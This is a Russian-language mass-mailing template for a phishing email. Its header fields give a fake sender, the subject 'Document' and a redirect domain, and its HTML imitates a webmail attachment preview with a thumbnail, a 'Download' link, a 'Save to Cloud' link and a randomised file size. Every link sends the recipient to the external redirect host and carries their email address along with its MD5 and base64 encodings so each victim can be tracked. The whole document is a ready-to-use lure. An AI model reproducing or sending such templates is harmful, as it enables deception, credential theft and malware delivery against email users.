


[FROM-NAME]Максим  Басов 
[FROM-EMAIL]smtp
[THEME]Документ
[TYPE]html
[ADD0]domenredirect.ru/redirectdoc.php
[TEXT]



<div dir="ltr"><style>
    .attimg {
        width: 239px;
        height: 178px;
        border-radius: 12px;
        background-size: cover;
        display: inline-block;
    }

    .attcount {
        font-weight: bold;
        padding-right: 12px;
    }

    .attinfo {
        margin-top: 10px;
        font-family: Arial, Tahoma, Verdana, sans-serif;
        font-size: 13px;
    }

    .attgray {
        color: rgb(147, 150, 155);
        padding-right: 13px;
    }
    .attinfo a{
        text-decoration: none;
    }
</style>
<a href="http://[ADD0]/?email=[TO-EMAIL]&amp;id=[TO-EMAIL-MD5]&amp;b=[TO-EMAIL-BASE64]">
    <div class="attimg" style="background-image:url('https://i.imgur.com/gTVBKmc.png');"></div>
</a>
<div class="attinfo">
    <span class="attcount">1 файл</span>
    <span><a href="http://[ADD0]/?email=[TO-EMAIL]&amp;id=[TO-EMAIL-MD5]&amp;b=[TO-EMAIL-BASE64]">Скачать</a> <span class="attgray">([RAND-111-999] КБ)</span></span>
    <span><a href="http://[ADD0]/?email=[TO-EMAIL]&amp;id=[TO-EMAIL-MD5]&amp;b=[TO-EMAIL-BASE64]">Сохранить в Облако</a></span>
</div>
</div>


<br><br><br>

